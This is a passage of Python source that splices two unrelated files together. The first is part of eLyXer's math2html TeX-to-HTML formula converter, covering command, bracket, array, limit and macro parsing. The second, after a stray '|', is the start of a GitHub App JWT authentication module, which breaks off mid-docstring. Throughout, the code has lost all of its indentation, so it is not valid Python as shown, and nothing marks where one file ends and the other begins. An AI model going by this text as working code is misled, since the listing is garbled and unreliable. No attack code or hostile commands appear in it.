upgreek = self.parsewithcommand(upcommand, pos)
if upgreek:
upgreek.type = 'font'
return upgreek
class CommandBit(FormulaCommand):
"A formula bit that includes a command"
def setcommand(self, command):
"Set the command in the bit"
self.command = command
if self.commandmap:
self.original += command
self.translated = self.commandmap[self.command]
def parseparameter(self, pos):
"Parse a parameter at the current position"
self.factory.clearskipped(pos)
if pos.finished():
return None
parameter = self.factory.parseany(pos)
self.add(parameter)
return parameter
def parsesquare(self, pos):
"Parse a square bracket"
self.factory.clearskipped(pos)
if not self.factory.detecttype(SquareBracket, pos):
return None
bracket = self.factory.parsetype(SquareBracket, pos)
self.add(bracket)
return bracket
def parseliteral(self, pos):
"Parse a literal bracket."
self.factory.clearskipped(pos)
if not self.factory.detecttype(Bracket, pos):
if not pos.isvalue():
Trace.error('No literal parameter found at: ' + pos.identifier())
return None
return pos.globvalue()
bracket = Bracket().setfactory(self.factory)
self.add(bracket.parseliteral(pos))
return bracket.literal
def parsesquareliteral(self, pos):
"Parse a square bracket literally."
self.factory.clearskipped(pos)
if not self.factory.detecttype(SquareBracket, pos):
return None
bracket = SquareBracket().setfactory(self.factory)
self.add(bracket.parseliteral(pos))
return bracket.literal
def parsetext(self, pos):
"Parse a text parameter."
self.factory.clearskipped(pos)
if not self.factory.detecttype(Bracket, pos):
Trace.error('No text parameter for ' + self.command)
return None
bracket = Bracket().setfactory(self.factory).parsetext(pos)
self.add(bracket)
return bracket
class EmptyCommand(CommandBit):
"An empty command (without parameters)"
commandmap = FormulaConfig.commands
def parsebit(self, pos):
"Parse a command without parameters"
self.contents = [FormulaConstant(self.translated)]
class SpacedCommand(CommandBit):
"An empty command which should have math spacing in formulas."
commandmap = FormulaConfig.spacedcommands
def parsebit(self, pos):
"Place as contents the command translated and spaced."
self.contents = [FormulaConstant(u' ' + self.translated + u' ')]
class AlphaCommand(EmptyCommand):
"A command without paramters whose result is alphabetical"
commandmap = FormulaConfig.alphacommands
def parsebit(self, pos):
"Parse the command and set type to alpha"
EmptyCommand.parsebit(self, pos)
self.type = 'alpha'
class OneParamFunction(CommandBit):
"A function of one parameter"
commandmap = FormulaConfig.onefunctions
simplified = False
def parsebit(self, pos):
"Parse a function with one parameter"
self.output = TaggedOutput().settag(self.translated)
self.parseparameter(pos)
self.simplifyifpossible()
def simplifyifpossible(self):
"Try to simplify to a single character."
if self.original in self.commandmap:
self.output = FixedOutput()
self.html = [self.commandmap[self.original]]
self.simplified = True
class SymbolFunction(CommandBit):
"Find a function which is represented by a symbol (like _ or ^)"
commandmap = FormulaConfig.symbolfunctions
def detect(self, pos):
"Find the symbol"
return pos.current() in SymbolFunction.commandmap
def parsebit(self, pos):
"Parse the symbol"
self.setcommand(pos.current())
pos.skip(self.command)
self.output = TaggedOutput().settag(self.translated)
self.parseparameter(pos)
class TextFunction(CommandBit):
"A function where parameters are read as text."
commandmap = FormulaConfig.textfunctions
def parsebit(self, pos):
"Parse a text parameter"
self.output = TaggedOutput().settag(self.translated)
self.parsetext(pos)
def process(self):
"Set the type to font"
self.type = 'font'
class LabelFunction(CommandBit):
"A function that acts as a label"
commandmap = FormulaConfig.labelfunctions
def parsebit(self, pos):
"Parse a literal parameter"
self.key = self.parseliteral(pos)
def process(self):
"Add an anchor with the label contents."
self.type = 'font'
self.label = Label().create(' ', self.key, type = 'eqnumber')
self.contents = [self.label]
# store as a Label so we know it's been seen
Label.names[self.key] = self.label
class FontFunction(OneParamFunction):
"A function of one parameter that changes the font"
commandmap = FormulaConfig.fontfunctions
def process(self):
"Simplify if possible using a single character."
self.type = 'font'
self.simplifyifpossible()
FormulaFactory.types += [FormulaCommand, SymbolFunction]
FormulaCommand.types = [
AlphaCommand, EmptyCommand, OneParamFunction, FontFunction, LabelFunction,
TextFunction, SpacedCommand,
]
class BigSymbol(object):
"A big symbol generator."
symbols = FormulaConfig.bigsymbols
def __init__(self, symbol):
"Create the big symbol."
self.symbol = symbol
def getpieces(self):
"Get an array with all pieces."
if not self.symbol in self.symbols:
return [self.symbol]
if self.smalllimit():
return [self.symbol]
return self.symbols[self.symbol]
def smalllimit(self):
"Decide if the limit should be a small, one-line symbol."
if not DocumentParameters.displaymode:
return True
if len(self.symbols[self.symbol]) == 1:
return True
return Options.simplemath
class BigBracket(BigSymbol):
"A big bracket generator."
def __init__(self, size, bracket, alignment='l'):
"Set the size and symbol for the bracket."
self.size = size
self.original = bracket
self.alignment = alignment
self.pieces = None
if bracket in FormulaConfig.bigbrackets:
self.pieces = FormulaConfig.bigbrackets[bracket]
def getpiece(self, index):
"Return the nth piece for the bracket."
function = getattr(self, 'getpiece' + unicode(len(self.pieces)))
return function(index)
def getpiece1(self, index):
"Return the only piece for a single-piece bracket."
return self.pieces[0]
def getpiece3(self, index):
"Get the nth piece for a 3-piece bracket: parenthesis or square bracket."
if index == 0:
return self.pieces[0]
if index == self.size - 1:
return self.pieces[-1]
return self.pieces[1]
def getpiece4(self, index):
"Get the nth piece for a 4-piece bracket: curly bracket."
if index == 0:
return self.pieces[0]
if index == self.size - 1:
return self.pieces[3]
if index == (self.size - 1)/2:
return self.pieces[2]
return self.pieces[1]
def getcell(self, index):
"Get the bracket piece as an array cell."
piece = self.getpiece(index)
span = 'span class="bracket align-' + self.alignment + '"'
return TaggedBit().constant(piece, span)
def getcontents(self):
"Get the bracket as an array or as a single bracket."
if self.size == 1 or not self.pieces:
return self.getsinglebracket()
rows = []
for index in range(self.size):
cell = self.getcell(index)
rows.append(TaggedBit().complete([cell], 'span class="arrayrow"'))
return [TaggedBit().complete(rows, 'span class="array"')]
def getsinglebracket(self):
"Return the bracket as a single sign."
if self.original == '.':
return [TaggedBit().constant('', 'span class="emptydot"')]
return [TaggedBit().constant(self.original, 'span class="symbol"')]
class FormulaEquation(CommandBit):
"A simple numbered equation."
piece = 'equation'
def parsebit(self, pos):
"Parse the array"
self.output = ContentsOutput()
self.add(self.factory.parsetype(WholeFormula, pos))
class FormulaCell(FormulaCommand):
"An array cell inside a row"
def setalignment(self, alignment):
self.alignment = alignment
self.output = TaggedOutput().settag('span class="arraycell align-' + alignment +'"', True)
return self
def parsebit(self, pos):
self.factory.clearskipped(pos)
if pos.finished():
return
self.add(self.factory.parsetype(WholeFormula, pos))
class FormulaRow(FormulaCommand):
"An array row inside an array"
cellseparator = FormulaConfig.array['cellseparator']
def setalignments(self, alignments):
self.alignments = alignments
self.output = TaggedOutput().settag('span class="arrayrow"', True)
return self
def parsebit(self, pos):
"Parse a whole row"
index = 0
pos.pushending(self.cellseparator, optional=True)
while not pos.finished():
cell = self.createcell(index)
cell.parsebit(pos)
self.add(cell)
index += 1
pos.checkskip(self.cellseparator)
if len(self.contents) == 0:
self.output = EmptyOutput()
def createcell(self, index):
"Create the cell that corresponds to the given index."
alignment = self.alignments[index % len(self.alignments)]
return self.factory.create(FormulaCell).setalignment(alignment)
class MultiRowFormula(CommandBit):
"A formula with multiple rows."
def parserows(self, pos):
"Parse all rows, finish when no more row ends"
self.rows = []
first = True
for row in self.iteraterows(pos):
if first:
first = False
else:
# intersparse empty rows
self.addempty()
row.parsebit(pos)
self.addrow(row)
self.size = len(self.rows)
def iteraterows(self, pos):
"Iterate over all rows, end when no more row ends"
rowseparator = FormulaConfig.array['rowseparator']
while True:
pos.pushending(rowseparator, True)
row = self.factory.create(FormulaRow)
yield row.setalignments(self.alignments)
if pos.checkfor(rowseparator):
self.original += pos.popending(rowseparator)
else:
return
def addempty(self):
"Add an empty row."
row = self.factory.create(FormulaRow).setalignments(self.alignments)
for index, originalcell in enumerate(self.rows[-1].contents):
cell = row.createcell(index)
cell.add(FormulaConstant(u' '))
row.add(cell)
self.addrow(row)
def addrow(self, row):
"Add a row to the contents and to the list of rows."
self.rows.append(row)
self.add(row)
class FormulaArray(MultiRowFormula):
"An array within a formula"
piece = 'array'
def parsebit(self, pos):
"Parse the array"
self.output = TaggedOutput().settag('span class="array"', False)
self.parsealignments(pos)
self.parserows(pos)
def parsealignments(self, pos):
"Parse the different alignments"
# vertical
self.valign = 'c'
literal = self.parsesquareliteral(pos)
if literal:
self.valign = literal
# horizontal
literal = self.parseliteral(pos)
self.alignments = []
for l in literal:
self.alignments.append(l)
class FormulaMatrix(MultiRowFormula):
"A matrix (array with center alignment)."
piece = 'matrix'
def parsebit(self, pos):
"Parse the matrix, set alignments to 'c'."
self.output = TaggedOutput().settag('span class="array"', False)
self.valign = 'c'
self.alignments = ['c']
self.parserows(pos)
class FormulaCases(MultiRowFormula):
"A cases statement"
piece = 'cases'
def parsebit(self, pos):
"Parse the cases"
self.output = ContentsOutput()
self.alignments = ['l', 'l']
self.parserows(pos)
for row in self.contents:
for cell in row.contents:
cell.output.settag('span class="case align-l"', True)
cell.contents.append(FormulaConstant(u' '))
array = TaggedBit().complete(self.contents, 'span class="bracketcases"', True)
brace = BigBracket(len(self.contents), '{', 'l')
self.contents = brace.getcontents() + [array]
class EquationEnvironment(MultiRowFormula):
"A \\begin{}...\\end equation environment with rows and cells."
def parsebit(self, pos):
"Parse the whole environment."
self.output = TaggedOutput().settag('span class="environment"', False)
environment = self.piece.replace('*', '')
if environment in FormulaConfig.environments:
self.alignments = FormulaConfig.environments[environment]
else:
Trace.error('Unknown equation environment ' + self.piece)
self.alignments = ['l']
self.parserows(pos)
class BeginCommand(CommandBit):
"A \\begin{}...\\end command and what it entails (array, cases, aligned)"
commandmap = {FormulaConfig.array['begin']:''}
types = [FormulaEquation, FormulaArray, FormulaCases, FormulaMatrix]
def parsebit(self, pos):
"Parse the begin command"
command = self.parseliteral(pos)
bit = self.findbit(command)
ending = FormulaConfig.array['end'] + '{' + command + '}'
pos.pushending(ending)
bit.parsebit(pos)
self.add(bit)
self.original += pos.popending(ending)
self.size = bit.size
def findbit(self, piece):
"Find the command bit corresponding to the \\begin{piece}"
for type in BeginCommand.types:
if piece.replace('*', '') == type.piece:
return self.factory.create(type)
bit = self.factory.create(EquationEnvironment)
bit.piece = piece
return bit
FormulaCommand.types += [BeginCommand]
class CombiningFunction(OneParamFunction):
commandmap = FormulaConfig.combiningfunctions
def parsebit(self, pos):
"Parse a combining function."
self.type = 'alpha'
combining = self.translated
parameter = self.parsesingleparameter(pos)
if not parameter:
Trace.error('Empty parameter for combining function ' + self.command)
elif len(parameter.extracttext()) != 1:
Trace.error('Applying combining function ' + self.command + ' to invalid string "' + parameter.extracttext() + '"')
self.contents.append(Constant(combining))
def parsesingleparameter(self, pos):
"Parse a parameter, or a single letter."
self.factory.clearskipped(pos)
if pos.finished():
Trace.error('Error while parsing single parameter at ' + pos.identifier())
return None
if self.factory.detecttype(Bracket, pos) \
or self.factory.detecttype(FormulaCommand, pos):
return self.parseparameter(pos)
letter = FormulaConstant(pos.skipcurrent())
self.add(letter)
return letter
class DecoratingFunction(OneParamFunction):
"A function that decorates some bit of text"
commandmap = FormulaConfig.decoratingfunctions
def parsebit(self, pos):
"Parse a decorating function"
self.type = 'alpha'
symbol = self.translated
self.symbol = TaggedBit().constant(symbol, 'span class="symbolover"')
self.parameter = self.parseparameter(pos)
self.output = TaggedOutput().settag('span class="withsymbol"')
self.contents.insert(0, self.symbol)
self.parameter.output = TaggedOutput().settag('span class="undersymbol"')
self.simplifyifpossible()
class LimitCommand(EmptyCommand):
"A command which accepts limits above and below, in display mode."
commandmap = FormulaConfig.limitcommands
def parsebit(self, pos):
"Parse a limit command."
pieces = BigSymbol(self.translated).getpieces()
self.output = TaggedOutput().settag('span class="limits"')
for piece in pieces:
self.contents.append(TaggedBit().constant(piece, 'span class="limit"'))
class LimitPreviousCommand(LimitCommand):
"A command to limit the previous command."
commandmap = None
def parsebit(self, pos):
"Do nothing."
self.output = TaggedOutput().settag('span class="limits"')
self.factory.clearskipped(pos)
def __unicode__(self):
"Return a printable representation."
return 'Limit previous command'
if sys.version_info >= (3, 0):
__str__ = __unicode__
class LimitsProcessor(MathsProcessor):
"A processor for limits inside an element."
def process(self, contents, index):
"Process the limits for an element."
if Options.simplemath:
return
if self.checklimits(contents, index):
self.modifylimits(contents, index)
if self.checkscript(contents, index) and self.checkscript(contents, index + 1):
self.modifyscripts(contents, index)
def checklimits(self, contents, index):
"Check if the current position has a limits command."
if not DocumentParameters.displaymode:
return False
if self.checkcommand(contents, index + 1, LimitPreviousCommand):
self.limitsahead(contents, index)
return False
if not isinstance(contents[index], LimitCommand):
return False
return self.checkscript(contents, index + 1)
def limitsahead(self, contents, index):
"Limit the current element based on the next."
contents[index + 1].add(contents[index].clone())
contents[index].output = EmptyOutput()
def modifylimits(self, contents, index):
"Modify a limits commands so that the limits appear above and below."
limited = contents[index]
subscript = self.getlimit(contents, index + 1)
limited.contents.append(subscript)
if self.checkscript(contents, index + 1):
superscript = self.getlimit(contents, index + 1)
else:
superscript = TaggedBit().constant(u' ', 'sup class="limit"')
limited.contents.insert(0, superscript)
def getlimit(self, contents, index):
"Get the limit for a limits command."
limit = self.getscript(contents, index)
limit.output.tag = limit.output.tag.replace('script', 'limit')
return limit
def modifyscripts(self, contents, index):
"Modify the super- and subscript to appear vertically aligned."
subscript = self.getscript(contents, index)
# subscript removed so instead of index + 1 we get index again
superscript = self.getscript(contents, index)
scripts = TaggedBit().complete([superscript, subscript], 'span class="scripts"')
contents.insert(index, scripts)
def checkscript(self, contents, index):
"Check if the current element is a sub- or superscript."
return self.checkcommand(contents, index, SymbolFunction)
def checkcommand(self, contents, index, type):
"Check for the given type as the current element."
if len(contents) <= index:
return False
return isinstance(contents[index], type)
def getscript(self, contents, index):
"Get the sub- or superscript."
bit = contents[index]
bit.output.tag += ' class="script"'
del contents[index]
return bit
class BracketCommand(OneParamFunction):
"A command which defines a bracket."
commandmap = FormulaConfig.bracketcommands
def parsebit(self, pos):
"Parse the bracket."
OneParamFunction.parsebit(self, pos)
def create(self, direction, character):
"Create the bracket for the given character."
self.original = character
self.command = '\\' + direction
self.contents = [FormulaConstant(character)]
return self
class BracketProcessor(MathsProcessor):
"A processor for bracket commands."
def process(self, contents, index):
"Convert the bracket using Unicode pieces, if possible."
if Options.simplemath:
return
if self.checkleft(contents, index):
return self.processleft(contents, index)
def processleft(self, contents, index):
"Process a left bracket."
rightindex = self.findright(contents, index + 1)
if not rightindex:
return
size = self.findmax(contents, index, rightindex)
self.resize(contents[index], size)
self.resize(contents[rightindex], size)
def checkleft(self, contents, index):
"Check if the command at the given index is left."
return self.checkdirection(contents[index], '\\left')
def checkright(self, contents, index):
"Check if the command at the given index is right."
return self.checkdirection(contents[index], '\\right')
def checkdirection(self, bit, command):
"Check if the given bit is the desired bracket command."
if not isinstance(bit, BracketCommand):
return False
return bit.command == command
def findright(self, contents, index):
"Find the right bracket starting at the given index, or 0."
depth = 1
while index < len(contents):
if self.checkleft(contents, index):
depth += 1
if self.checkright(contents, index):
depth -= 1
if depth == 0:
return index
index += 1
return None
def findmax(self, contents, leftindex, rightindex):
"Find the max size of the contents between the two given indices."
sliced = contents[leftindex:rightindex]
return max([element.size for element in sliced])
def resize(self, command, size):
"Resize a bracket command to the given size."
character = command.extracttext()
alignment = command.command.replace('\\', '')
bracket = BigBracket(size, character, alignment)
command.output = ContentsOutput()
command.contents = bracket.getcontents()
class TodayCommand(EmptyCommand):
"Shows today's date."
commandmap = None
def parsebit(self, pos):
"Parse a command without parameters"
self.output = FixedOutput()
self.html = [datetime.date.today().strftime('%b %d, %Y')]
FormulaCommand.types += [
DecoratingFunction, CombiningFunction, LimitCommand, BracketCommand,
]
FormulaProcessor.processors += [
LimitsProcessor(), BracketProcessor(),
]
class ParameterDefinition(object):
"The definition of a parameter in a hybrid function."
"[] parameters are optional, {} parameters are mandatory."
"Each parameter has a one-character name, like {$1} or {$p}."
"A parameter that ends in ! like {$p!} is a literal."
"Example: [$1]{$p!} reads an optional parameter $1 and a literal mandatory parameter p."
parambrackets = [('[', ']'), ('{', '}')]
def __init__(self):
self.name = None
self.literal = False
self.optional = False
self.value = None
self.literalvalue = None
def parse(self, pos):
"Parse a parameter definition: [$0], {$x}, {$1!}..."
for (opening, closing) in ParameterDefinition.parambrackets:
if pos.checkskip(opening):
if opening == '[':
self.optional = True
if not pos.checkskip('$'):
Trace.error('Wrong parameter name, did you mean $' + pos.current() + '?')
return None
self.name = pos.skipcurrent()
if pos.checkskip('!'):
self.literal = True
if not pos.checkskip(closing):
Trace.error('Wrong parameter closing ' + pos.skipcurrent())
return None
return self
Trace.error('Wrong character in parameter template: ' + pos.skipcurrent())
return None
def read(self, pos, function):
"Read the parameter itself using the definition."
if self.literal:
if self.optional:
self.literalvalue = function.parsesquareliteral(pos)
else:
self.literalvalue = function.parseliteral(pos)
if self.literalvalue:
self.value = FormulaConstant(self.literalvalue)
elif self.optional:
self.value = function.parsesquare(pos)
else:
self.value = function.parseparameter(pos)
def __unicode__(self):
"Return a printable representation."
result = 'param ' + self.name
if self.value:
result += ': ' + unicode(self.value)
else:
result += ' (empty)'
return result
if sys.version_info >= (3, 0):
__str__ = __unicode__
class ParameterFunction(CommandBit):
"A function with a variable number of parameters defined in a template."
"The parameters are defined as a parameter definition."
def readparams(self, readtemplate, pos):
"Read the params according to the template."
self.params = dict()
for paramdef in self.paramdefs(readtemplate):
paramdef.read(pos, self)
self.params['$' + paramdef.name] = paramdef
def paramdefs(self, readtemplate):
"Read each param definition in the template"
pos = TextPosition(readtemplate)
while not pos.finished():
paramdef = ParameterDefinition().parse(pos)
if paramdef:
yield paramdef
def getparam(self, name):
"Get a parameter as parsed."
if not name in self.params:
return None
return self.params[name]
def getvalue(self, name):
"Get the value of a parameter."
return self.getparam(name).value
def getliteralvalue(self, name):
"Get the literal value of a parameter."
param = self.getparam(name)
if not param or not param.literalvalue:
return None
return param.literalvalue
class HybridFunction(ParameterFunction):
"""
A parameter function where the output is also defined using a template.
The template can use a number of functions; each function has an associated
tag.
Example: [f0{$1},span class="fbox"] defines a function f0 which corresponds
to a span of class fbox, yielding <span class="fbox">$1</span>.
Literal parameters can be used in tags definitions:
[f0{$1},span style="color: $p;"]
yields <span style="color: $p;">$1</span>, where $p is a literal parameter.
Sizes can be specified in hybridsizes, e.g. adding parameter sizes. By
default the resulting size is the max of all arguments. Sizes are used
to generate the right parameters.
A function followed by a single / is output as a self-closing XHTML tag:
[f0/,hr]
will generate <hr/>.
"""
commandmap = FormulaConfig.hybridfunctions
def parsebit(self, pos):
"Parse a function with [] and {} parameters"
readtemplate = self.translated[0]
writetemplate = self.translated[1]
self.readparams(readtemplate, pos)
self.contents = self.writeparams(writetemplate)
self.computehybridsize()
def writeparams(self, writetemplate):
"Write all params according to the template"
return self.writepos(TextPosition(writetemplate))
def writepos(self, pos):
"Write all params as read in the parse position."
result = []
while not pos.finished():
if pos.checkskip('$'):
param = self.writeparam(pos)
if param:
result.append(param)
elif pos.checkskip('f'):
function = self.writefunction(pos)
if function:
function.type = None
result.append(function)
elif pos.checkskip('('):
result.append(self.writebracket('left', '('))
elif pos.checkskip(')'):
result.append(self.writebracket('right', ')'))
else:
result.append(FormulaConstant(pos.skipcurrent()))
return result
def writeparam(self, pos):
"Write a single param of the form $0, $x..."
name = '$' + pos.skipcurrent()
if not name in self.params:
Trace.error('Unknown parameter ' + name)
return None
if not self.params[name]:
return None
if pos.checkskip('.'):
self.params[name].value.type = pos.globalpha()
return self.params[name].value
def writefunction(self, pos):
"Write a single function f0,...,fn."
tag = self.readtag(pos)
if not tag:
return None
if pos.checkskip('/'):
# self-closing XHTML tag, such as <hr/>
return TaggedBit().selfcomplete(tag)
if not pos.checkskip('{'):
Trace.error('Function should be defined in {}')
return None
pos.pushending('}')
contents = self.writepos(pos)
pos.popending()
if len(contents) == 0:
return None
return TaggedBit().complete(contents, tag)
def readtag(self, pos):
"Get the tag corresponding to the given index. Does parameter substitution."
if not pos.current().isdigit():
Trace.error('Function should be f0,...,f9: f' + pos.current())
return None
index = int(pos.skipcurrent())
if 2 + index > len(self.translated):
Trace.error('Function f' + unicode(index) + ' is not defined')
return None
tag = self.translated[2 + index]
if not '$' in tag:
return tag
for variable in self.params:
if variable in tag:
param = self.params[variable]
if not param.literal:
Trace.error('Parameters in tag ' + tag + ' should be literal: {' + variable + '!}')
continue
if param.literalvalue:
value = param.literalvalue
else:
value = ''
tag = tag.replace(variable, value)
return tag
def writebracket(self, direction, character):
"Return a new bracket looking at the given direction."
return self.factory.create(BracketCommand).create(direction, character)
def computehybridsize(self):
"Compute the size of the hybrid function."
if not self.command in HybridSize.configsizes:
self.computesize()
return
self.size = HybridSize().getsize(self)
# set the size in all elements at first level
for element in self.contents:
element.size = self.size
class HybridSize(object):
"The size associated with a hybrid function."
configsizes = FormulaConfig.hybridsizes
def getsize(self, function):
"Read the size for a function and parse it."
sizestring = self.configsizes[function.command]
for name in function.params:
if name in sizestring:
size = function.params[name].value.computesize()
sizestring = sizestring.replace(name, unicode(size))
if '$' in sizestring:
Trace.error('Unconverted variable in hybrid size: ' + sizestring)
return 1
return eval(sizestring)
FormulaCommand.types += [HybridFunction]
class HeaderParser(Parser):
"Parses the LyX header"
def parse(self, reader):
"Parse header parameters into a dictionary, return the preamble."
contents = []
self.parseending(reader, lambda: self.parseline(reader, contents))
# skip last line
reader.nextline()
return contents
def parseline(self, reader, contents):
"Parse a single line as a parameter or as a start"
line = reader.currentline()
if line.startswith(HeaderConfig.parameters['branch']):
self.parsebranch(reader)
return
elif line.startswith(HeaderConfig.parameters['lstset']):
LstParser().parselstset(reader)
return
elif line.startswith(HeaderConfig.parameters['beginpreamble']):
contents.append(self.factory.createcontainer(reader))
return
# no match
self.parseparameter(reader)
def parsebranch(self, reader):
"Parse all branch definitions."
branch = reader.currentline().split()[1]
reader.nextline()
subparser = HeaderParser().complete(HeaderConfig.parameters['endbranch'])
subparser.parse(reader)
options = BranchOptions(branch)
for key in subparser.parameters:
options.set(key, subparser.parameters[key])
Options.branches[branch] = options
def complete(self, ending):
"Complete the parser with the given ending."
self.ending = ending
return self
class PreambleParser(Parser):
"A parser for the LyX preamble."
preamble = []
def parse(self, reader):
"Parse the full preamble with all statements."
self.ending = HeaderConfig.parameters['endpreamble']
self.parseending(reader, lambda: self.parsepreambleline(reader))
return []
def parsepreambleline(self, reader):
"Parse a single preamble line."
PreambleParser.preamble.append(reader.currentline())
reader.nextline()
class LstParser(object):
"Parse global and local lstparams."
globalparams = dict()
def parselstset(self, reader):
"Parse a declaration of lstparams in lstset."
paramtext = self.extractlstset(reader)
if not '{' in paramtext:
Trace.error('Missing opening bracket in lstset: ' + paramtext)
return
lefttext = paramtext.split('{')[1]
croppedtext = lefttext[:-1]
LstParser.globalparams = self.parselstparams(croppedtext)
def extractlstset(self, reader):
"Extract the global lstset parameters."
paramtext = ''
while not reader.finished():
paramtext += reader.currentline()
reader.nextline()
if paramtext.endswith('}'):
return paramtext
Trace.error('Could not find end of \\lstset settings; aborting')
def parsecontainer(self, container):
"Parse some lstparams from elyxer.a container."
container.lstparams = LstParser.globalparams.copy()
paramlist = container.getparameterlist('lstparams')
container.lstparams.update(self.parselstparams(paramlist))
def parselstparams(self, paramlist):
"Process a number of lstparams from elyxer.a list."
paramdict = dict()
for param in paramlist:
if not '=' in param:
if len(param.strip()) > 0:
Trace.error('Invalid listing parameter ' + param)
else:
key, value = param.split('=', 1)
paramdict[key] = value
return paramdict
class MacroDefinition(CommandBit):
"A function that defines a new command (a macro)."
macros = dict()
def parsebit(self, pos):
"Parse the function that defines the macro."
self.output = EmptyOutput()
self.parameternumber = 0
self.defaults = []
self.factory.defining = True
self.parseparameters(pos)
self.factory.defining = False
Trace.debug('New command ' + self.newcommand + ' (' + \
unicode(self.parameternumber) + ' parameters)')
self.macros[self.newcommand] = self
def parseparameters(self, pos):
"Parse all optional parameters (number of parameters, default values)"
"and the mandatory definition."
self.newcommand = self.parsenewcommand(pos)
# parse number of parameters
literal = self.parsesquareliteral(pos)
if literal:
self.parameternumber = int(literal)
# parse all default values
bracket = self.parsesquare(pos)
while bracket:
self.defaults.append(bracket)
bracket = self.parsesquare(pos)
# parse mandatory definition
self.definition = self.parseparameter(pos)
def parsenewcommand(self, pos):
"Parse the name of the new command."
self.factory.clearskipped(pos)
if self.factory.detecttype(Bracket, pos):
return self.parseliteral(pos)
if self.factory.detecttype(FormulaCommand, pos):
return self.factory.create(FormulaCommand).extractcommand(pos)
Trace.error('Unknown formula bit in defining function at ' + pos.identifier())
return 'unknown'
def instantiate(self):
"Return an instance of the macro."
return self.definition.clone()
class MacroParameter(FormulaBit):
"A parameter from elyxer.a macro."
def detect(self, pos):
"Find a macro parameter: #n."
return pos.checkfor('#')
def parsebit(self, pos):
"Parse the parameter: #n."
if not pos.checkskip('#'):
Trace.error('Missing parameter start #.')
return
self.number = int(pos.skipcurrent())
self.original = '#' + unicode(self.number)
self.contents = [TaggedBit().constant('#' + unicode(self.number), 'span class="unknown"')]
class MacroFunction(CommandBit):
"A function that was defined using a macro."
commandmap = MacroDefinition.macros
def parsebit(self, pos):
"Parse a number of input parameters."
self.output = FilteredOutput()
self.values = []
macro = self.translated
self.parseparameters(pos, macro)
self.completemacro(macro)
def parseparameters(self, pos, macro):
"Parse as many parameters as are needed."
self.parseoptional(pos, list(macro.defaults))
self.parsemandatory(pos, macro.parameternumber - len(macro.defaults))
if len(self.values) < macro.parameternumber:
Trace.error('Missing parameters in macro ' + unicode(self))
def parseoptional(self, pos, defaults):
"Parse optional parameters."
optional = []
while self.factory.detecttype(SquareBracket, pos):
optional.append(self.parsesquare(pos))
if len(optional) > len(defaults):
break
for value in optional:
default = defaults.pop()
if len(value.contents) > 0:
self.values.append(value)
else:
self.values.append(default)
self.values += defaults
def parsemandatory(self, pos, number):
"Parse a number of mandatory parameters."
for index in range(number):
parameter = self.parsemacroparameter(pos, number - index)
if not parameter:
return
self.values.append(parameter)
def parsemacroparameter(self, pos, remaining):
"Parse a macro parameter. Could be a bracket or a single letter."
"If there are just two values remaining and there is a running number,"
"parse as two separater numbers."
self.factory.clearskipped(pos)
if pos.finished():
return None
if self.factory.detecttype(FormulaNumber, pos):
return self.parsenumbers(pos, remaining)
return self.parseparameter(pos)
def parsenumbers(self, pos, remaining):
"Parse the remaining parameters as a running number."
"For example, 12 would be {1}{2}."
number = self.factory.parsetype(FormulaNumber, pos)
if not len(number.original) == remaining:
return number
for digit in number.original:
value = self.factory.create(FormulaNumber)
value.add(FormulaConstant(digit))
value.type = number
self.values.append(value)
return None
def completemacro(self, macro):
"Complete the macro with the parameters read."
self.contents = [macro.instantiate()]
replaced = [False] * len(self.values)
for parameter in self.searchall(MacroParameter):
index = parameter.number - 1
if index >= len(self.values):
Trace.error('Macro parameter index out of bounds: ' + unicode(index))
return
replaced[index] = True
parameter.contents = [self.values[index].clone()]
for index in range(len(self.values)):
if not replaced[index]:
self.addfilter(index, self.values[index])
def addfilter(self, index, value):
"Add a filter for the given parameter number and parameter value."
original = '#' + unicode(index + 1)
value = ''.join(self.values[0].gethtml())
self.output.addfilter(original, value)
class FormulaMacro(Formula):
"A math macro defined in an inset."
def __init__(self):
self.parser = MacroParser()
self.output = EmptyOutput()
def __unicode__(self):
"Return a printable representation."
return 'Math macro'
if sys.version_info >= (3, 0):
__str__ = __unicode__
FormulaFactory.types += [ MacroParameter ]
FormulaCommand.types += [
MacroFunction,
]
def math2html(formula):
"Convert some TeX math to HTML."
factory = FormulaFactory()
whole = factory.parseformula(formula)
FormulaProcessor().process(whole)
whole.process()
return ''.join(whole.gethtml())
def main():
"Main function, called if invoked from elyxer.the command line"
args = sys.argv
Options().parseoptions(args)
if len(args) != 1:
Trace.error('Usage: math2html.py escaped_string')
exit()
result = math2html(args[0])
Trace.message(result)
if __name__ == '__main__':
main()
|
"""Sites hosted on Github"""
import base64
import json
import os.path
import re
import time
import typing
from datetime import datetime
import jwt
import requests
from flask import current_app
from ghapi.all import GhApi
from interpersonal.errors import InterpersonalNotFoundError
from interpersonal.sitetypes import base
class GithubAppJwt:
"""A Github JWT token
<https://docs.github.com/en/developers/apps/building-github-apps/authenticating-with-github-apps#jwt-payload>
app_id: The Github application ID
private_key_pem: A string containing either the private key or a path to it
"""
def __init__(self, private_key_pem: str, app_id: str):
self.app_id = app_id
try:
with open(private_key_pem) as pkf:
key_contents = pkf.read().encode()
except FileNotFoundError:
key_contents = private_key_pem.encode()
self.key = key_contents
self._token = None
self.expires = 0
@property
def token(self):
"""Retrieve the JWT token
Caches the result and only regenerates the token if it is expiring soon
"""
expiring_soon = self.expires < (int(time.time()) - 15)
if self._token is None or expiring_soon:
now = int(time.time())
expires = now + (10 * 60)
payload = {
# issued at time, 60 seconds in the past to allow for clock drift
"iat": now - 60,
# JWT expiration time (10 minute maximum)
"exp": expires,
# GitHub App's identifier
"iss": int(self.app_id),
}
self.expires = expires
token = jwt.encode(payload, self.key, "RS256")
if isinstance(token, bytes):
token = token.decode("utf-8")
self._token = token
return self._token
class GithubApiAppJwtAuth:
"""Call the Github API with the app JWT bearer token authentication.
This is for authenticating _as the app_,
NOT for authenticating _as a particular installation of the app_.
This is required for URIs like /app/installations,
which are not specific to a given installation but are for the whole app.
URIs like "/repos/{owner}/{repo}/contents/{path}" only work when authenticating
_as a particular installation of the app_.
These routes should not be called from this function.
This function uses the requests library to call the GH REST API directly.
For other API calls, we use the GhApi package,
but that package has problems with JWT bearer token auth.
See /docs/ghapi.md for more details.
"""
def __init__(self, ghajwt: GithubAppJwt):
self.ghajwt = ghajwt
self._install_tokens = {}
def call(self, method, uri, headers=None, **kwargs):
"""Call the Github API with the app JWT bearer token authentication.
This is for authenticating _as the app_,
NOT for authenticating _as a particular installation of the app_.
This is required for URIs like /app/installations,
which are not specific to a given installation but are for the whole app.
URIs like "/repos/{owner}/{repo}/contents/{path}" only work when authenticating
_as a particular installation of the app_.
